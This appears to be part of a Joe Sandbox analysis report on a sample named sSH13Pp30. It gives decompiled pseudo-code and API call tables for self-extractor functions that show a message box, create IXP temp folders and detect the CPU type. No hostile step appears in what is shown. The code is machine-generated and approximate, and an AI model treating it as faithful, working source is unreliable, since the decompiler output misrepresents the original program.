                                                                                                                                                                                                      			E000E44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v64;
                                                                                                                                                                                                      				char _v576;
                                                                                                                                                                                                      				void* _v580;
                                                                                                                                                                                                      				struct HWND__* _v584;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t34;
                                                                                                                                                                                                      				void* _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				signed int _t52;
                                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                                                                      				intOrPtr _t58;
                                                                                                                                                                                                      				intOrPtr _t59;
                                                                                                                                                                                                      				int _t64;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				intOrPtr* _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      				intOrPtr* _t73;
                                                                                                                                                                                                      				intOrPtr* _t76;
                                                                                                                                                                                                      				intOrPtr* _t77;
                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                      				void* _t81;
                                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                                      				intOrPtr* _t84;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				signed int _t89;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t75 = __edx;
                                                                                                                                                                                                      				_t34 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                      				_v584 = __ecx;
                                                                                                                                                                                                      				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                      				_t67 = _a4;
                                                                                                                                                                                                      				_t69 = 0xd;
                                                                                                                                                                                                      				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                      				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                      				_v580 = _t37;
                                                                                                                                                                                                      				asm("movsb");
                                                                                                                                                                                                      				if(( *0xe8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                      					_t39 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_v576 = 0;
                                                                                                                                                                                                      					LoadStringA( *0xe9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                      					if(_v576 != 0) {
                                                                                                                                                                                                      						_t73 =  &_v576;
                                                                                                                                                                                                      						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                      						_t75 = _t16;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t43 =  *_t73;
                                                                                                                                                                                                      							_t73 = _t73 + 1;
                                                                                                                                                                                                      						} while (_t43 != 0);
                                                                                                                                                                                                      						_t84 = _v580;
                                                                                                                                                                                                      						_t74 = _t73 - _t75;
                                                                                                                                                                                                      						if(_t84 == 0) {
                                                                                                                                                                                                      							if(_t67 == 0) {
                                                                                                                                                                                                      								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                      								_t83 = _t27;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t75 = _t83;
                                                                                                                                                                                                      									_t74 = _t80;
                                                                                                                                                                                                      									E000E1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t76 = _t67;
                                                                                                                                                                                                      								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                      								_t85 = _t24;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t55 =  *_t76;
                                                                                                                                                                                                      									_t76 = _t76 + 1;
                                                                                                                                                                                                      								} while (_t55 != 0);
                                                                                                                                                                                                      								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                      								_t83 = _t25 + _t74;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E000E171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t77 = _t67;
                                                                                                                                                                                                      							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                      							_t81 = _t18;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t58 =  *_t77;
                                                                                                                                                                                                      								_t77 = _t77 + 1;
                                                                                                                                                                                                      							} while (_t58 != 0);
                                                                                                                                                                                                      							_t75 = _t77 - _t81;
                                                                                                                                                                                                      							_t82 = _t84 + 1;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t59 =  *_t84;
                                                                                                                                                                                                      								_t84 = _t84 + 1;
                                                                                                                                                                                                      							} while (_t59 != 0);
                                                                                                                                                                                                      							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                      							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                      							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                      							_t80 = _t44;
                                                                                                                                                                                                      							if(_t80 == 0) {
                                                                                                                                                                                                      								goto L6;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_push(_v580);
                                                                                                                                                                                                      								E000E171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      								L23:
                                                                                                                                                                                                      								MessageBeep(_a12);
                                                                                                                                                                                                      								if(E000E681F(_t67) == 0) {
                                                                                                                                                                                                      									L25:
                                                                                                                                                                                                      									_t49 = 0x10000;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t54 = E000E67C9(_t74, _t74);
                                                                                                                                                                                                      									_t49 = 0x190000;
                                                                                                                                                                                                      									if(_t54 == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                      								_t83 = _t52;
                                                                                                                                                                                                      								LocalFree(_t80);
                                                                                                                                                                                                      								_t39 = _t52;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(E000E681F(_t67) == 0) {
                                                                                                                                                                                                      							L4:
                                                                                                                                                                                                      							_t64 = 0x10010;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t66 = E000E67C9(0, 0);
                                                                                                                                                                                                      							_t64 = 0x190010;
                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                      								goto L4;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                      			}



































                                                                                                                                                                                                      0x000e44b9
                                                                                                                                                                                                      0x000e44c4
                                                                                                                                                                                                      0x000e44cb
                                                                                                                                                                                                      0x000e44d8
                                                                                                                                                                                                      0x000e44e4
                                                                                                                                                                                                      0x000e44eb
                                                                                                                                                                                                      0x000e44ee
                                                                                                                                                                                                      0x000e44ef
                                                                                                                                                                                                      0x000e44ef
                                                                                                                                                                                                      0x000e44f1
                                                                                                                                                                                                      0x000e44f7
                                                                                                                                                                                                      0x000e44f8
                                                                                                                                                                                                      0x000e467b
                                                                                                                                                                                                      0x000e44fe
                                                                                                                                                                                                      0x000e4509
                                                                                                                                                                                                      0x000e4518
                                                                                                                                                                                                      0x000e4525
                                                                                                                                                                                                      0x000e4562
                                                                                                                                                                                                      0x000e4568
                                                                                                                                                                                                      0x000e4568
                                                                                                                                                                                                      0x000e456b
                                                                                                                                                                                                      0x000e456b
                                                                                                                                                                                                      0x000e456d
                                                                                                                                                                                                      0x000e456e
                                                                                                                                                                                                      0x000e4572
                                                                                                                                                                                                      0x000e4578
                                                                                                                                                                                                      0x000e457c
                                                                                                                                                                                                      0x000e45cb
                                                                                                                                                                                                      0x000e4607
                                                                                                                                                                                                      0x000e4607
                                                                                                                                                                                                      0x000e460d
                                                                                                                                                                                                      0x000e4613
                                                                                                                                                                                                      0x000e4617
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e461d
                                                                                                                                                                                                      0x000e4623
                                                                                                                                                                                                      0x000e4626
                                                                                                                                                                                                      0x000e4628
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4628
                                                                                                                                                                                                      0x000e45cd
                                                                                                                                                                                                      0x000e45cd
                                                                                                                                                                                                      0x000e45cf
                                                                                                                                                                                                      0x000e45cf
                                                                                                                                                                                                      0x000e45d2
                                                                                                                                                                                                      0x000e45d2
                                                                                                                                                                                                      0x000e45d4
                                                                                                                                                                                                      0x000e45d5
                                                                                                                                                                                                      0x000e45db
                                                                                                                                                                                                      0x000e45de
                                                                                                                                                                                                      0x000e45e3
                                                                                                                                                                                                      0x000e45e9
                                                                                                                                                                                                      0x000e45ed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e45f3
                                                                                                                                                                                                      0x000e45fd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4602
                                                                                                                                                                                                      0x000e45ed
                                                                                                                                                                                                      0x000e457e
                                                                                                                                                                                                      0x000e457e
                                                                                                                                                                                                      0x000e4580
                                                                                                                                                                                                      0x000e4580
                                                                                                                                                                                                      0x000e4583
                                                                                                                                                                                                      0x000e4583
                                                                                                                                                                                                      0x000e4585
                                                                                                                                                                                                      0x000e4586
                                                                                                                                                                                                      0x000e458a
                                                                                                                                                                                                      0x000e458c
                                                                                                                                                                                                      0x000e458f
                                                                                                                                                                                                      0x000e458f
                                                                                                                                                                                                      0x000e4591
                                                                                                                                                                                                      0x000e4592
                                                                                                                                                                                                      0x000e459b
                                                                                                                                                                                                      0x000e459e
                                                                                                                                                                                                      0x000e45a3
                                                                                                                                                                                                      0x000e45a9
                                                                                                                                                                                                      0x000e45ad
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e45af
                                                                                                                                                                                                      0x000e45af
                                                                                                                                                                                                      0x000e45bf
                                                                                                                                                                                                      0x000e462d
                                                                                                                                                                                                      0x000e4630
                                                                                                                                                                                                      0x000e463d
                                                                                                                                                                                                      0x000e464e
                                                                                                                                                                                                      0x000e464e
                                                                                                                                                                                                      0x000e463f
                                                                                                                                                                                                      0x000e4640
                                                                                                                                                                                                      0x000e4647
                                                                                                                                                                                                      0x000e464c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e464c
                                                                                                                                                                                                      0x000e4666
                                                                                                                                                                                                      0x000e466d
                                                                                                                                                                                                      0x000e466f
                                                                                                                                                                                                      0x000e4675
                                                                                                                                                                                                      0x000e4675
                                                                                                                                                                                                      0x000e45ad
                                                                                                                                                                                                      0x000e4527
                                                                                                                                                                                                      0x000e452e
                                                                                                                                                                                                      0x000e453f
                                                                                                                                                                                                      0x000e453f
                                                                                                                                                                                                      0x000e4530
                                                                                                                                                                                                      0x000e4531
                                                                                                                                                                                                      0x000e4538
                                                                                                                                                                                                      0x000e453d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e453d
                                                                                                                                                                                                      0x000e4554
                                                                                                                                                                                                      0x000e455a
                                                                                                                                                                                                      0x000e455a
                                                                                                                                                                                                      0x000e455a
                                                                                                                                                                                                      0x000e4525
                                                                                                                                                                                                      0x000e468c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                      • MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 000E45A3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 000E45E3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000002), ref: 000E460D
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 000E4630
                                                                                                                                                                                                      • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 000E4666
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 000E466F
                                                                                                                                                                                                        • Part of subcall function 000E681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 000E686E
                                                                                                                                                                                                        • Part of subcall function 000E681F: GetSystemMetrics.USER32(0000004A), ref: 000E68A7
                                                                                                                                                                                                        • Part of subcall function 000E681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000E68CC
                                                                                                                                                                                                        • Part of subcall function 000E681F: RegQueryValueExA.ADVAPI32(?,000E1140,00000000,?,?,0000000C), ref: 000E68F4
                                                                                                                                                                                                        • Part of subcall function 000E681F: RegCloseKey.ADVAPI32(?), ref: 000E6902
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                      • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                      • API String ID: 3244514340-2605220145
                                                                                                                                                                                                      • Opcode ID: 4b0c90f4b885b6ea75eda9a3939922189ac8485df6770875e64bc6309facccc4
                                                                                                                                                                                                      • Instruction ID: 53ed77820de4823dd136d9bcd9cd03b7353bc920e4524d05b9cde2a1e8cce9e9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b0c90f4b885b6ea75eda9a3939922189ac8485df6770875e64bc6309facccc4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35511672A00295AFDB219F29DC48BFA7BA8EF46700F044195FD49B7242DB36DD05CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E000E53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				long _t13;
                                                                                                                                                                                                      				int _t14;
                                                                                                                                                                                                      				CHAR* _t20;
                                                                                                                                                                                                      				int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				CHAR* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                      				_t32 = __edx;
                                                                                                                                                                                                      				_t20 = __ecx;
                                                                                                                                                                                                      				_t29 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					E000E171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                      					_t34 = _t34 + 0x10;
                                                                                                                                                                                                      					_t29 = _t29 + 1;
                                                                                                                                                                                                      					E000E1680(_t32, 0x104, _t20);
                                                                                                                                                                                                      					E000E658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                      					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                      					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                      					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t29 < 0x190) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t30 = 0;
                                                                                                                                                                                                      					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                      						_t30 = 1;
                                                                                                                                                                                                      						DeleteFileA(_t32);
                                                                                                                                                                                                      						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return E000E6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t30 = 1;
                                                                                                                                                                                                      				 *0xe8a20 = 1;
                                                                                                                                                                                                      				goto L5;
                                                                                                                                                                                                      			}

















                                                                                                                                                                                                      0x000e53ac
                                                                                                                                                                                                      0x000e53b3
                                                                                                                                                                                                      0x000e53b9
                                                                                                                                                                                                      0x000e53bb
                                                                                                                                                                                                      0x000e53bd
                                                                                                                                                                                                      0x000e53bf
                                                                                                                                                                                                      0x000e53d1
                                                                                                                                                                                                      0x000e53d6
                                                                                                                                                                                                      0x000e53e0
                                                                                                                                                                                                      0x000e53e2
                                                                                                                                                                                                      0x000e53f5
                                                                                                                                                                                                      0x000e53fb
                                                                                                                                                                                                      0x000e5402
                                                                                                                                                                                                      0x000e540b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5413
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5415
                                                                                                                                                                                                      0x000e5416
                                                                                                                                                                                                      0x000e5427
                                                                                                                                                                                                      0x000e542a
                                                                                                                                                                                                      0x000e542b
                                                                                                                                                                                                      0x000e5434
                                                                                                                                                                                                      0x000e5434
                                                                                                                                                                                                      0x000e543a
                                                                                                                                                                                                      0x000e544c
                                                                                                                                                                                                      0x000e544c
                                                                                                                                                                                                      0x000e5452
                                                                                                                                                                                                      0x000e545a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e545e
                                                                                                                                                                                                      0x000e545f
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E171E: _vsnprintf.MSVCRT ref: 000E1750
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E53FB
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E5402
                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E541F
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E542B
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E5434
                                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E5452
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                      • API String ID: 1082909758-2966903483
                                                                                                                                                                                                      • Opcode ID: d4dd0d71d06a4f7193cf99c4215b7674d26c5af521d2262887fd0de5704b3f18
                                                                                                                                                                                                      • Instruction ID: c3f4e050091d6338c86ba8f53bef3ec28a7dd46bcdc203155462be6ee8286d55
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4dd0d71d06a4f7193cf99c4215b7674d26c5af521d2262887fd0de5704b3f18
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 781108713005846BE7209B379C89FEF366DDBC6B26F000425B646F61D1CE789D828661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 522 e5467-e5484 523 e551c-e5528 call e1680 522->523 524 e548a-e5490 call e53a1 522->524 528 e552d-e5539 call e58c8 523->528 527 e5495-e5497 524->527 529 e549d-e54c0 call e1781 527->529 530 e5581-e5583 527->530 537 e554d-e5552 528->537 538 e553b-e5545 CreateDirectoryA 528->538 543 e550c-e551a call e658a 529->543 544 e54c2-e54d8 GetSystemInfo 529->544 533 e558d-e559d call e6ce0 530->533 541 e5554-e5557 call e597d 537->541 542 e5585-e558b 537->542 539 e5577-e557c call e6285 538->539 540 e5547 538->540 539->530 540->537 551 e555c-e555e 541->551 542->533 543->528 549 e54fe 544->549 550 e54da-e54dd 544->550 552 e5503-e5507 call e658a 549->552 555 e54df-e54e2 550->555 556 e54f7-e54fc 550->556 551->542 559 e5560-e5566 551->559 552->543 557 e54e4-e54e7 555->557 558 e54f0-e54f5 555->558 556->552 557->543 561 e54e9-e54ee 557->561 558->552 559->530 562 e5568-e5575 RemoveDirectoryA 559->562 561->552 562->530
                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E000E5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t10;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				intOrPtr _t14;
                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR* _t48;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				intOrPtr _t61;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t10 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				if(__edx == 0) {
                                                                                                                                                                                                      					_t48 = 0xe91e4;
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E000E1680(0xe91e4, 0x104);
                                                                                                                                                                                                      					L14:
                                                                                                                                                                                                      					_t13 = E000E58C8(_t48); // executed
                                                                                                                                                                                                      					if(_t13 != 0) {
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						_t42 = _a4;
                                                                                                                                                                                                      						if(_a4 == 0) {
                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                      							 *0xe9124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      							L24:
                                                                                                                                                                                                      							return E000E6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t16 = E000E597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                      						if(_t16 != 0) {
                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t61 =  *0xe8a20; // 0x0
                                                                                                                                                                                                      						if(_t61 != 0) {
                                                                                                                                                                                                      							 *0xe8a20 = 0;
                                                                                                                                                                                                      							RemoveDirectoryA(_t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L22:
                                                                                                                                                                                                      						_t14 = 0;
                                                                                                                                                                                                      						goto L24;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                      						 *0xe9124 = E000E6285();
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xe8a20 = 1;
                                                                                                                                                                                                      					goto L17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 =  &_v268;
                                                                                                                                                                                                      				_t20 = E000E53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                      				if(_t20 == 0) {
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t48 = 0xe91e4;
                                                                                                                                                                                                      				E000E1781(0xe91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                      				if(( *0xe9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E000E658A(_t48, 0x104, 0xe1140);
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				GetSystemInfo( &_v304);
                                                                                                                                                                                                      				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					_push("i386");
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					E000E658A(_t48, 0x104);
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = _t26 - 1;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					_push("mips");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = _t28 - 1;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					_push("alpha");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t29 != 1) {
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push("ppc");
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}




















                                                                                                                                                                                                      0x000e5472
                                                                                                                                                                                                      0x000e5479
                                                                                                                                                                                                      0x000e5481
                                                                                                                                                                                                      0x000e5484
                                                                                                                                                                                                      0x000e551c
                                                                                                                                                                                                      0x000e5521
                                                                                                                                                                                                      0x000e5528
                                                                                                                                                                                                      0x000e552d
                                                                                                                                                                                                      0x000e552f
                                                                                                                                                                                                      0x000e5539
                                                                                                                                                                                                      0x000e554d
                                                                                                                                                                                                      0x000e554d
                                                                                                                                                                                                      0x000e5552
                                                                                                                                                                                                      0x000e5585
                                                                                                                                                                                                      0x000e5585
                                                                                                                                                                                                      0x000e558b
                                                                                                                                                                                                      0x000e558d
                                                                                                                                                                                                      0x000e559d
                                                                                                                                                                                                      0x000e559d
                                                                                                                                                                                                      0x000e5557
                                                                                                                                                                                                      0x000e555e
                                                                                                                                                                                                      0x00000000
